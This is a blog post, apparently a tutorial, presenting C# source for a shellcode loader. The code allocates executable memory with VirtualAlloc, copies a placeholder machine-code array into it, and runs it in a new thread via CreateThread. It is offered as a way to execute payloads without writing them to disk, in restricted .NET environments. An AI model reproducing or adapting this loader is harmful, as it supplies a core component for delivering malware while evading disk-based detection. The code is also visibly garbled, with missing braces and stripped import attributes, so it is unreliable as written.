Bookmark and Share

.Net shellcode load and execute

In a previous post  I gave you a bit of example code for generating c# shellcode from a binary. In this one I will show you how to load this shellcode into memory and execute it without ever writing the binary to disk. This method works in medium trust environments and it's pretty damn neat.

The variable called 'dynamics' below is the variable you will be replacing with your generated machine code. (Check the previous article on how to generate this code)

        public void ExecuteMachineCode()
            //MACHINE CODE
            byte[] dynamics = new byte[1] {0x00};

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)dynamics.Length,
                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(dynamics, 0, (IntPtr)(funcAddr), dynamics.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        private static UInt32 MEM_COMMIT = 0x1000;

        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        private static extern bool VirtualFree(IntPtr lpAddress,
                              UInt32 dwSize, UInt32 dwFreeType);

        private static extern IntPtr CreateThread(

          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId

        private static extern bool CloseHandle(IntPtr handle);

        private static extern UInt32 WaitForSingleObject(

          IntPtr hHandle,
          UInt32 dwMilliseconds
        private static extern IntPtr GetModuleHandle(

          string moduleName

        private static extern UInt32 GetProcAddress(

          IntPtr hModule,
          string procName

        private static extern UInt32 LoadLibrary(

          string lpFileName

        private static extern UInt32 GetLastError();